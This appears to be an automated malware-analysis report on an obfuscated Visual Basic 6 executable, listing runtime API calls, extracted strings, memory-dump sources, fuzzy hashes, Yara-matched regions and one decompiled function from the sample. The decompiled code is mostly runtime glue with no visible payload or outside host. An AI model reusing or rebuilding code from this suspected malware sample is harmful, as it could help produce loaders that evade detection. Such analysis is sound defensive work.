__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0042B10C,00000198), ref: 0042C7E8
__vbaNew2.MSVBVM60(0042A01C,00430010,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0042C800
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0042C81B
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0042B1AC,00000178), ref: 0042C844
__vbaNew2.MSVBVM60(0042A01C,00430010,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0042C85C
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0042C877
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0042B0FC,00000058), ref: 0042C89A
__vbaHresultCheckObj.MSVBVM60(00000000,00401158,0042AC10,000006FC), ref: 0042C906
__vbaFreeObjList.MSVBVM60(00000003,?,?,?), ref: 0042C924

Strings

AMPHORAL, xrefs: 0042C0F4
@k, xrefs: 0042C8EA
Mariamman, xrefs: 0042BDF8
Smaaartikler4, xrefs: 0042B9FE
jHCw1jHImJpY116, xrefs: 0042BD9C

Memory Dump Source

Source File: 00000000.00000002.758565087.0000000000429000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.758417737.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.758452513.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.758479347.0000000000419000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.758619364.0000000000430000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.758690514.0000000000431000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$CheckHresult$Free$New2$List$Move$Late$AnsiCall$Construct2ErrorSystem$#580#598#617#648#706#716Addref
String ID: @k$AMPHORAL$Mariamman$Smaaartikler4$jHCw1jHImJpY116
API String ID: 1772267442-3703120728
Opcode ID: d4b91f4773d7c7b20950b61be383bb26bf901319e0d7a910c20651c59063db32
Instruction ID: 1ea574dd5e1caf2e6677c849f085a47c7f2c3b0e3bd33399d40e7a99145aff59
Opcode Fuzzy Hash: d4b91f4773d7c7b20950b61be383bb26bf901319e0d7a910c20651c59063db32
Instruction Fuzzy Hash: D1A262B1A00229ABDB24EF51DC95FDA77B8AF08304F5005BAF509F7191DB785A84CF68

Uniqueness

Uniqueness Score: -1.00%

Function 0042E6BD, Relevance: 79.0, APIs: 42, Strings: 3, Instructions: 259
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E0042E6BD(void* __ebx, void* __edi, void* __esi, void* __fp0, intOrPtr* _a4, void* _a8, void* _a16, void* _a20) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				char _v64;
				char _v68;
				char _v72;
				char _v80;
				char _v88;
				intOrPtr _v96;
				intOrPtr _v104;
				char _v108;
				void* _t78;
				signed int _t80;
				intOrPtr* _t81;
				intOrPtr* _t83;
				void* _t85;
				intOrPtr* _t87;
				intOrPtr* _t89;
				void* _t91;
				char* _t92;
				intOrPtr* _t99;
				char _t139;
				intOrPtr* _t141;
				intOrPtr* _t148;
				intOrPtr* _t149;
				void* _t150;
				void* _t152;
				intOrPtr _t153;
				intOrPtr _t154;
				void* _t155;
				intOrPtr _t161;
				void* _t168;

				_t168 = __fp0;
				_t153 = _t152 - 0xc;
				 *[fs:0x0] = _t153;
				_t154 = _t153 - 0x68;
				_v16 = _t154;
				_v12 = 0x401168;
				_v8 = 0;
				_t141 = _a4;
				 *((intOrPtr*)( *_t141 + 4))(_t141, __edi, __esi, __ebx,  *[fs:0x0], 0x4011b6, _t150);
				_v36 = 0;
				_v40 = 0;
				_v44 = 0;
				_v48 = 0;
				_v52 = 0;
				_v56 = 0;
				_v60 = 0;
				_v64 = 0;
				_v68 = 0;
				_v72 = 0;
				_v88 = 0;
				_v108 = 0;
				L0040128E();
				L0040128E();
				L0040128E();
				_t78 =  *((intOrPtr*)( *_t141 + 0x114))(_t141, 1);
				asm("fclex");
				if(_t78 < 0) {
					_push(0x114);
					_push(0x42abe0);
					_push(_t141);
					_push(_t78);
					L00401306();
				}
				_t80 =  *((intOrPtr*)( *_t141 + 0x110))(_t141,  &_v108);
				asm("fclex");
				if(_t80 < 0) {
					_push(0x110);
					_push(0x42abe0);
					_push(_t141);
					_push(_t80);
					L00401306();
				}
				if(_v108 == 0) {
					L00401276();
					L004012CA();
					_push( &_v88);
					_v80 = 0x80020004;
					_v88 = 0xa;
					L00401270();
					st0 = _t168;
					L0040131E();
					_t161 =  *0x430340; // 0x218e8b4
					if(_t161 == 0) {
						_push(0x430340);
						_push(0x42af8c);
						L0040130C();
					}
					_t149 =  *0x430340; // 0x218e8b4
					_t80 =  *((intOrPtr*)( *_t149 + 0x48))(_t149, 0x9b,  &_v64);
					asm("fclex");
					if(_t80 < 0) {
						_push(0x48);
						_push(0x42b13c);
						_push(_t149);
						_push(_t80);
						L00401306();
					}
					_v64 = 0;
					L004012CA();
				}
				_t155 = _t154 - 0x10;
				_v96 = 0x80020004;
				_v104 = 0xa;
				asm("movsd");
				asm("movsd");
				_push(L"Multigyrate");
				asm("movsd");
				_push(L"HAMPSHIREMEN");
				_push(L"HUNDEAGTIG");
				asm("movsd"); // executed
				L00401264(); // executed
				L004012CA();
				_push(_t80);
				_push(0);
				L0040126A();
				asm("sbb esi, esi");
				L004012E2();
				if( ~( ~( ~_t80)) != 0) {
					_t139 = 2;
					_push(0xfffffffe);
					_push(0xfffffffe);
					_push(0xfffffffe);
					_push(0xffffffff);
					_push( &_v88);
					_v80 = 0;
					_v88 = _t139;
					L0040125E();
					L004012CA();
					L0040131E();
					L00401276();
					L004012CA();
					_t87 =  *0x430010; // 0x4df9f8
					if(_t87 == 0) {
						_push(0x430010);
						_push(0x42a01c);
						L0040130C();
						_t87 =  *0x430010; // 0x4df9f8
					}
					_t89 =  &_v68;
					L00401312();
					_t148 = _t89;
					_t91 =  *((intOrPtr*)( *_t148 + 0x130))(_t148,  &_v72, _t89,  *((intOrPtr*)( *_t87 + 0x320))(_t87));
					asm("fclex");
					if(_t91 < 0) {
						_push(0x130);
						_push(0x42b1ac);
						_push(_t148);
						_push(_t91);
						L00401306();
					}
					_push(0);
					_push(0);
					_push(_v72);
					_t92 =  &_v88;
					_push(_t92);
					L004012B2();
					_push(_t92);
					L004012A6();
					L004012CA();
					_push(_t92);
					L00401258();
					L004012E2();
					_push( &_v72);
					_push( &_v68);
					_push(_t139);
					L004012E8();
					_t155 = _t155 + 0x1c;
					L0040131E();
				}
				_t81 =  *0x430010; // 0x4df9f8
				if(_t81 == 0) {
					_push(0x430010);
					_push(0x42a01c);
					L0040130C();
					_t81 =  *0x430010; // 0x4df9f8
				}
				_t83 =  &_v68;
				L00401312();
				_v96 = 0x80020004;
				_v104 = 0xa;
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t99 = _t83;
				asm("movsd");
				_t85 =  *((intOrPtr*)( *_t99 + 0x1b0))(_t99, _t83,  *((intOrPtr*)( *_t81 + 0x31c))(_t81));
				asm("fclex");
				if(_t85 < 0) {
					_push(0x1b0);
					_push(0x42b1ac);
					_push(_t99);
					_push(_t85);
					L00401306();
				}
				L00401300();
				asm("wait");
				_push(0x42ea0e);
				L004012E2();
				L004012E2();
				L004012E2();
				L004012E2();
				L004012E2();
				L004012E2();
				L004012E2();
				return _t85;
			}

0x0042e6bd
0x0042e6c0
0x0042e6cf
0x0042e6d6
0x0042e6dc
0x0042e6df
0x0042e6e8
0x0042e6eb
0x0042e6f1
0x0042e6fa
0x0042e6fd
0x0042e700
0x0042e703
0x0042e706
0x0042e709
0x0042e70c
0x0042e70f
0x0042e712
0x0042e715
0x0042e718
0x0042e71b
0x0042e71e
0x0042e729
0x0042e734
0x0042e73e
0x0042e744
0x0042e748
0x0042e74a
0x0042e74f
0x0042e754
0x0042e755
0x0042e756
0x0042e756
0x0042e762
0x0042e768
0x0042e76c
0x0042e76e
0x0042e773
0x0042e778
0x0042e779
0x0042e77a
0x0042e77a
0x0042e783
0x0042e785
0x0042e78f
0x0042e797
0x0042e798
0x0042e79f
0x0042e7a6
0x0042e7ab
0x0042e7b0
0x0042e7b5
0x0042e7bb
0x0042e7bd
0x0042e7c2
0x0042e7c7
0x0042e7c7
0x0042e7cc
0x0042e7de
0x0042e7e1
0x0042e7e5
0x0042e7e7
0x0042e7e9
0x0042e7ee
0x0042e7ef
0x0042e7f0
0x0042e7f0
0x0042e7fb
0x0042e7fe
0x0042e7fe
0x0042e803
0x0042e808
0x0042e80f
0x0042e819
0x0042e81a
0x0042e81b
0x0042e820
0x0042e821
0x0042e826
0x0042e82b
0x0042e82c
0x0042e836
0x0042e83b
0x0042e83c
0x0042e83d
0x0042e846
0x0042e84f
0x0042e857
0x0042e85f
0x0042e860
0x0042e862
0x0042e864
0x0042e866
0x0042e86b
0x0042e86c
0x0042e86f
0x0042e872
0x0042e87c
0x0042e884
0x0042e889
0x0042e893
0x0042e898
0x0042e89f
0x0042e8a1
0x0042e8a6
0x0042e8ab
0x0042e8b0
0x0042e8b0
0x0042e8bf
0x0042e8c3
0x0042e8cb
0x0042e8d1
0x0042e8d7
0x0042e8db
0x0042e8dd
0x0042e8e2
0x0042e8e7
0x0042e8e8
0x0042e8e9
0x0042e8e9
0x0042e8ee
0x0042e8ef
0x0042e8f0
0x0042e8f3
0x0042e8f6
0x0042e8f7
0x0042e8ff
0x0042e900
0x0042e90a
0x0042e90f
0x0042e910
0x0042e918
0x0042e920
0x0042e924
0x0042e925
0x0042e926
0x0042e92b
0x0042e931
0x0042e931
0x0042e936
0x0042e93d
0x0042e93f
0x0042e944
0x0042e949
0x0042e94e
0x0042e94e
0x0042e95d
0x0042e961
0x0042e969
0x0042e970
0x0042e97c
0x0042e97d
0x0042e97e
0x0042e97f
0x0042e984
0x0042e985
0x0042e98d
0x0042e98f
0x0042e991
0x0042e996
0x0042e99b
0x0042e99c
0x0042e99d
0x0042e99d
0x0042e9a5
0x0042e9aa
0x0042e9ab
0x0042e9d8
0x0042e9e0
0x0042e9e8
0x0042e9f0
0x0042e9f8
0x0042ea00
0x0042ea08
0x0042ea0d

APIs

__vbaStrCopy.MSVBVM60 ref: 0042E71E
__vbaStrCopy.MSVBVM60 ref: 0042E729
__vbaStrCopy.MSVBVM60 ref: 0042E734
__vbaHresultCheckObj.MSVBVM60(00000000,00401168,0042ABE0,00000114), ref: 0042E756
__vbaHresultCheckObj.MSVBVM60(00000000,00401168,0042ABE0,00000110), ref: 0042E77A
#611.MSVBVM60(00000000,00401168,0042ABE0,00000110), ref: 0042E785
__vbaStrMove.MSVBVM60(00000000,00401168,0042ABE0,00000110), ref: 0042E78F
#593.MSVBVM60(?), ref: 0042E7A6
__vbaFreeVar.MSVBVM60(?), ref: 0042E7B0
__vbaNew2.MSVBVM60(0042AF8C,00430340,?), ref: 0042E7C7
__vbaHresultCheckObj.MSVBVM60(00000000,0218E8B4,0042B13C,00000048), ref: 0042E7F0
__vbaStrMove.MSVBVM60(00000000,0218E8B4,0042B13C,00000048), ref: 0042E7FE
#689.MSVBVM60(HUNDEAGTIG,HAMPSHIREMEN,Multigyrate), ref: 0042E82C
__vbaStrMove.MSVBVM60(HUNDEAGTIG,HAMPSHIREMEN,Multigyrate), ref: 0042E836
__vbaStrCmp.MSVBVM60(00000000,00000000,HUNDEAGTIG,HAMPSHIREMEN,Multigyrate), ref: 0042E83D
__vbaFreeStr.MSVBVM60(00000000,00000000,HUNDEAGTIG,HAMPSHIREMEN,Multigyrate), ref: 0042E84F
#704.MSVBVM60(?,000000FF,000000FE,000000FE,000000FE,00000000,00000000,HUNDEAGTIG,HAMPSHIREMEN,Multigyrate), ref: 0042E872
__vbaStrMove.MSVBVM60(?,000000FF,000000FE,000000FE,000000FE,00000000,00000000,HUNDEAGTIG,HAMPSHIREMEN,Multigyrate), ref: 0042E87C
__vbaFreeVar.MSVBVM60(?,000000FF,000000FE,000000FE,000000FE,00000000,00000000,HUNDEAGTIG,HAMPSHIREMEN,Multigyrate), ref: 0042E884
#611.MSVBVM60(?,000000FF,000000FE,000000FE,000000FE,00000000,00000000,HUNDEAGTIG,HAMPSHIREMEN,Multigyrate), ref: 0042E889
__vbaStrMove.MSVBVM60(?,000000FF,000000FE,000000FE,000000FE,00000000,00000000,HUNDEAGTIG,HAMPSHIREMEN,Multigyrate), ref: 0042E893
__vbaNew2.MSVBVM60(0042A01C,00430010,?,000000FF,000000FE,000000FE,000000FE,00000000,00000000,HUNDEAGTIG,HAMPSHIREMEN,Multigyrate), ref: 0042E8AB
__vbaObjSet.MSVBVM60(?,00000000), ref: 0042E8C3
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0042B1AC,00000130), ref: 0042E8E9
__vbaLateIdCallLd.MSVBVM60(?,?,00000000,00000000), ref: 0042E8F7
__vbaStrVarMove.MSVBVM60(00000000), ref: 0042E900
__vbaStrMove.MSVBVM60(00000000), ref: 0042E90A
#531.MSVBVM60(00000000,00000000), ref: 0042E910
__vbaFreeStr.MSVBVM60(00000000,00000000), ref: 0042E918
__vbaFreeObjList.MSVBVM60(00000002,?,?,00000000,00000000), ref: 0042E926
__vbaFreeVar.MSVBVM60(?,00000000,00000000), ref: 0042E931
__vbaNew2.MSVBVM60(0042A01C,00430010,00000000,00000000,HUNDEAGTIG,HAMPSHIREMEN,Multigyrate), ref: 0042E949
__vbaObjSet.MSVBVM60(?,00000000), ref: 0042E961
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0042B1AC,000001B0), ref: 0042E99D
__vbaFreeObj.MSVBVM60(00000000,00000000,0042B1AC,000001B0), ref: 0042E9A5
__vbaFreeStr.MSVBVM60(0042EA0E), ref: 0042E9D8
__vbaFreeStr.MSVBVM60(0042EA0E), ref: 0042E9E0
__vbaFreeStr.MSVBVM60(0042EA0E), ref: 0042E9E8
__vbaFreeStr.MSVBVM60(0042EA0E), ref: 0042E9F0
__vbaFreeStr.MSVBVM60(0042EA0E), ref: 0042E9F8
__vbaFreeStr.MSVBVM60(0042EA0E), ref: 0042EA00
__vbaFreeStr.MSVBVM60(0042EA0E), ref: 0042EA08

Strings

Multigyrate, xrefs: 0042E81B
HUNDEAGTIG, xrefs: 0042E826
HAMPSHIREMEN, xrefs: 0042E821

Memory Dump Source

Source File: 00000000.00000002.758565087.0000000000429000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.758417737.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.758452513.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.758479347.0000000000419000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.758619364.0000000000430000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.758690514.0000000000431000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$Move$CheckHresult$CopyNew2$#611$#531#593#689#704CallLateList
String ID: HAMPSHIREMEN$HUNDEAGTIG$Multigyrate
API String ID: 4052605307-3540949827
Opcode ID: 3018707651b1a7f7f2841d7b89e8343ed46f189af6be76f008e97dd83bff7d0a
Instruction ID: 652bf3e4fc3945c4fdf96fd3f88c1271425649fc05dd36e6db9798e7970acfee
Opcode Fuzzy Hash: 3018707651b1a7f7f2841d7b89e8343ed46f189af6be76f008e97dd83bff7d0a
Instruction Fuzzy Hash: 45917F70A00218ABCB04EFE6D996EDEB7B8AF08304F60457EF512B71E5DB785905CB58

Uniqueness

Uniqueness Score: -1.00%

Function 00401368, Relevance: 4.6, APIs: 1, Strings: 1, Instructions: 1149COMMON

Download Yara Rule

APIs

#100.MSVBVM60(VB5!6%*), ref: 0040136D

Strings

VB5!6%*, xrefs: 00401368

Memory Dump Source

Source File: 00000000.00000002.758452513.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.758417737.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.758479347.0000000000419000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.758565087.0000000000429000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.758619364.0000000000430000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.758690514.0000000000431000.00000002.00020000.sdmp Download File

Similarity

API ID: #100
String ID: VB5!6%*
API String ID: 1341478452-4246263594
Opcode ID: f7d8842f7c76879048047e13770323b20ca67da274f54422291eed2d7e749f40
Instruction ID: 982235bd84307ed4822afef49ffddabf45188f6c7c029d2b0e43bccae6ddcf01
Opcode Fuzzy Hash: f7d8842f7c76879048047e13770323b20ca67da274f54422291eed2d7e749f40
Instruction Fuzzy Hash: 11D1BD7144E3C19FC7039B708CA65967FB0AE13210B5E45EBC8C18F4B3E22C9A5AD766

Uniqueness

Uniqueness Score: -1.00%

Function 005E15F3, Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.758859850.00000000005E0000.00000020.00000001.sdmp, Offset: 005E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aa4461e65aa1642f62bcc655ba64e6abee030db3d9fd604ca8c44987bf4bd3b5
Instruction ID: 1f0d23f86a65d387172259f62a8fd3ad931191e308212a8f6afe87bd90c6277b
Opcode Fuzzy Hash: aa4461e65aa1642f62bcc655ba64e6abee030db3d9fd604ca8c44987bf4bd3b5
Instruction Fuzzy Hash: 1DD05E7130F2C0AFD709DB248D169953FF4AB87211B1908FEE584CB282E6249C418722

Uniqueness

Uniqueness Score: -1.00%

Function 0042AE50, Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.758565087.0000000000429000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.758417737.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.758452513.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.758479347.0000000000419000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.758619364.0000000000430000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.758690514.0000000000431000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 858014ec972f42a52b1ab0c988b1a6e4a8dbfe66ea0999f248dfbb3583b8ee3e
Instruction ID: 63c04f01405b4fe96cf723e0e470a2dc761d5a963b8be31d1accadcd9b438db0
Opcode Fuzzy Hash: 858014ec972f42a52b1ab0c988b1a6e4a8dbfe66ea0999f248dfbb3583b8ee3e
Instruction Fuzzy Hash: 40B012103C40119B521042547C02939538093057C03E14D73FD54E11A0D618CE52C32F

Uniqueness

Uniqueness Score: -1.00%

Function 0042AEA4, Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.758565087.0000000000429000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.758417737.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.758452513.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.758479347.0000000000419000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.758619364.0000000000430000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.758690514.0000000000431000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 56118a3c1e2747d076476229e66c6ce763874d4f5e5544666d189e5e65f9b1f9
Instruction ID: 858dc41f33cee062ffd100aee658891807ca9b38da4b5f66c5a51ac7893cdf7b
Opcode Fuzzy Hash: 56118a3c1e2747d076476229e66c6ce763874d4f5e5544666d189e5e65f9b1f9
Instruction Fuzzy Hash: 3CB012103C80139F930043586C42821328097413C03610C73F800D21A0DB6CCC11C22F

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 02AD2C89, Relevance: 9.2, Strings: 6, Instructions: 1672COMMON

Download Yara Rule

Strings

ekh, xrefs: 02AD4686
7X?b, xrefs: 02AD4583
@, xrefs: 02AD07C9
Bvu, xrefs: 02AD4467
y, xrefs: 02AD072A
oB}, xrefs: 02AD41F3

Memory Dump Source

Source File: 00000000.00000002.764314852.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: 7X?b$@$Bvu$oB}$y$ekh
API String ID: 0-3802085915
Opcode ID: f4ece2b0ca4f170b2426239df306352b1b7a886af9c04b138b74156f0b72acb7
Instruction ID: e3f73456633c76d18af215bbd5f9f513e0f0770e71f4766573c93957f17e1278
Opcode Fuzzy Hash: f4ece2b0ca4f170b2426239df306352b1b7a886af9c04b138b74156f0b72acb7
Instruction Fuzzy Hash: 59D22271A043459FEB248F38CDD47DA7BA2FF8A360FA5412EDC8A9B244D7349981CB51

Uniqueness

Uniqueness Score: -1.00%

Function 02AD0594, Relevance: 8.6, Strings: 6, Instructions: 1125COMMON

Download Yara Rule

Strings

ekh, xrefs: 02AD4686
7X?b, xrefs: 02AD4583
@, xrefs: 02AD07C9
Bvu, xrefs: 02AD4467
y, xrefs: 02AD072A
oB}, xrefs: 02AD41F3

Memory Dump Source

Source File: 00000000.00000002.764314852.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: 7X?b$@$Bvu$oB}$y$ekh
API String ID: 0-3802085915
Opcode ID: 419cd7768a8f145cf7c83284bcea80994d4d217f0bc9088201ea8df64786af76
Instruction ID: 70f7df2a1defcf25bf0978936b7124e2727aa9e344ff7de6993e97be96aad6fe
Opcode Fuzzy Hash: 419cd7768a8f145cf7c83284bcea80994d4d217f0bc9088201ea8df64786af76
Instruction Fuzzy Hash: FA9277B26443459FEB248F7489D43DB7BA2FF8A350FA1412EDC8A9B204D7788981CB51

Uniqueness

Uniqueness Score: -1.00%

Function 02AD83F5, Relevance: 7.9, Strings: 6, Instructions: 433COMMON

Download Yara Rule

Strings

vH, xrefs: 02AD88A7
5', xrefs: 02AD87BD
#&, xrefs: 02AD87ED
h*u/, xrefs: 02AD86BB
h*u/, xrefs: 02AD86C0
#&, xrefs: 02AD87F2

Memory Dump Source

Source File: 00000000.00000002.764314852.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: vH$#&$#&$5'$h*u/$h*u/
API String ID: 0-2554457197
Opcode ID: 6418eaeb936a1c938e4244e2b563d43fd8f7ffed27da0dabc66e24fa959d7d7d
Instruction ID: 79b3eba7c8a20306c8d500b564e7b3110b05867df7e88c7d7997f85e511ffbcb
Opcode Fuzzy Hash: 6418eaeb936a1c938e4244e2b563d43fd8f7ffed27da0dabc66e24fa959d7d7d
Instruction Fuzzy Hash: B2F1B4619083824EDB25CB3888D8B56BBD29F53370F49C39AD9E68F1E7D7388546C712

Uniqueness

Uniqueness Score: -1.00%

Function 02AD8147, Relevance: 6.7, Strings: 5, Instructions: 485COMMON

Download Yara Rule

Strings

5', xrefs: 02AD87BD
#&, xrefs: 02AD87ED
h*u/, xrefs: 02AD86BB
h*u/, xrefs: 02AD86C0
#&, xrefs: 02AD87F2

Memory Dump Source

Source File: 00000000.00000002.764314852.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: #&$#&$5'$h*u/$h*u/
API String ID: 0-188740086
Opcode ID: 7ebf831a4e1ff077b659191a311b42700b380ca6a47bda46ef892c084d976165
Instruction ID: 0944a1bb896e6e2bbed0e5439ec40ad82d2211d079f6f397585977efabf08c93
Opcode Fuzzy Hash: 7ebf831a4e1ff077b659191a311b42700b380ca6a47bda46ef892c084d976165
Instruction Fuzzy Hash: 5F02E5629483C18FDB228B3898E97C7BFE59F4B230F5982C6C8954F6A7D72D8541C721

Uniqueness

Uniqueness Score: -1.00%

Function 02AD7CEF, Relevance: 6.1, Strings: 4, Instructions: 1064COMMON

Download Yara Rule

Strings

ekh, xrefs: 02AD4686
7X?b, xrefs: 02AD4583
Bvu, xrefs: 02AD4467
oB}, xrefs: 02AD41F3

Memory Dump Source

Source File: 00000000.00000002.764314852.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: 7X?b$Bvu$oB}$ekh
API String ID: 0-1204367100
Opcode ID: 668e71517b49dddfdb2501fe70271377e33af9348ff05d48ead2e2dca818d7a7
Instruction ID: 4aa6cf6d7998931f02108dfac659737c1b30d9ac84be18314c718ec474be15bb
Opcode Fuzzy Hash: 668e71517b49dddfdb2501fe70271377e33af9348ff05d48ead2e2dca818d7a7
Instruction Fuzzy Hash: 188277B16043459FEB349F78CD947DA7BA2FF4A350FA0412EDC8A9B244D7749A81CB42

Uniqueness

Uniqueness Score: -1.00%

Function 02AD5242, Relevance: 6.0, Strings: 4, Instructions: 975COMMON

Download Yara Rule

Strings

ekh, xrefs: 02AD4686
7X?b, xrefs: 02AD4583
Bvu, xrefs: 02AD4467
oB}, xrefs: 02AD41F3

Memory Dump Source

Source File: 00000000.00000002.764314852.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: 7X?b$Bvu$oB}$ekh
API String ID: 0-1204367100
Opcode ID: 3b661246fcf93fc364d43db93bb03bf784695c4492c1068125e7dc5872561546
Instruction ID: e2d4d860dd724e7032f2bbdebd2885119f08908b978dd1bad48df5e71f492195
Opcode Fuzzy Hash: 3b661246fcf93fc364d43db93bb03bf784695c4492c1068125e7dc5872561546
Instruction Fuzzy Hash: F37247B56043499FEB348F78CD947DA7BA2FF49350F90812EDC8A9B214D7749A81CB42

Uniqueness

Uniqueness Score: -1.00%

Function 02AD51B0, Relevance: 5.9, Strings: 4, Instructions: 869COMMON

Download Yara Rule

Strings

ekh, xrefs: 02AD4686
7X?b, xrefs: 02AD4583
Bvu, xrefs: 02AD4467
oB}, xrefs: 02AD41F3

Memory Dump Source

Source File: 00000000.00000002.764314852.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: 7X?b$Bvu$oB}$ekh
API String ID: 0-1204367100
Opcode ID: b59285f22afa0b6b20a941557da883e13b7507714555c6b65d3ccfa123f5ca90
Instruction ID: 8392eac758453fc247d493f30bff5f6098aa39e0ec4a0571fa2c61e1ee041946
Opcode Fuzzy Hash: b59285f22afa0b6b20a941557da883e13b7507714555c6b65d3ccfa123f5ca90
Instruction Fuzzy Hash: A06257B16003459FEB748F78CD987DA7BA2FF49350FA0812DDC8A9B214D7749A85CB42

Uniqueness

Uniqueness Score: -1.00%

Function 02AD3F63, Relevance: 5.8, Strings: 4, Instructions: 839COMMON

Download Yara Rule

Strings

ekh, xrefs: 02AD4686
7X?b, xrefs: 02AD4583
Bvu, xrefs: 02AD4467
oB}, xrefs: 02AD41F3

Memory Dump Source

Source File: 00000000.00000002.764314852.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: 7X?b$Bvu$oB}$ekh
API String ID: 0-1204367100
Opcode ID: d91e1b367c401eed9a61a931638233bfccc9a618d969a03b2410361a492fb33c
Instruction ID: 622b9d8af4ea81da5945b9641b5de0d696aa95bfccb7ceb206dab2f3dbe437f9
Opcode Fuzzy Hash: d91e1b367c401eed9a61a931638233bfccc9a618d969a03b2410361a492fb33c
Instruction Fuzzy Hash: 1A6257B26043859FEB354F7489D93DB7BA2FF4A320FA4412EDC898B604D7798981CB51

Uniqueness

Uniqueness Score: -1.00%

Function 02AD4345, Relevance: 4.4, Strings: 3, Instructions: 646COMMON

Download Yara Rule

Strings

ekh, xrefs: 02AD4686
7X?b, xrefs: 02AD4583
Bvu, xrefs: 02AD4467

Memory Dump Source

Source File: 00000000.00000002.764314852.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: 7X?b$Bvu$ekh
API String ID: 0-124653226
Opcode ID: abcc97253d54aaaad00b6254470555310051747624f5ba6ae65bef3c51ece7db
Instruction ID: 5488c9999953c1c17e76f067a4eef9b89a1b17d915c614a89e33206baa3a4932
Opcode Fuzzy Hash: abcc97253d54aaaad00b6254470555310051747624f5ba6ae65bef3c51ece7db
Instruction Fuzzy Hash: 8B3238B25043859FEB214F7489D53DB7BB2FF4A320FA4816EDC858B604D7798981CB51

Uniqueness

Uniqueness Score: -1.00%

Function 02AD60F8, Relevance: 4.0, Strings: 3, Instructions: 212COMMON

Download Yara Rule

Strings

:t , xrefs: 02AD613F
&']a, xrefs: 02AD61B6
wQuO, xrefs: 02AD6298

Memory Dump Source

Source File: 00000000.00000002.764314852.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: &']a$:t $wQuO
API String ID: 0-822594646
Opcode ID: d055b2ff88ca913b0a52804df2797a789d03f67638779af17ce7f879745cc535
Instruction ID: 2bc5fff7da593f4bf1688df5d376c2602187d06c220645c383e4d1818f128414
Opcode Fuzzy Hash: d055b2ff88ca913b0a52804df2797a789d03f67638779af17ce7f879745cc535
Instruction Fuzzy Hash: 5461A8B8A4031A8FDB25AF64C9947DE7AA3BF58350FA0802AEC4687644DF70DD91CF51

Uniqueness

Uniqueness Score: -1.00%

Function 02AD479E, Relevance: .4, Instructions: 429COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.764314852.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
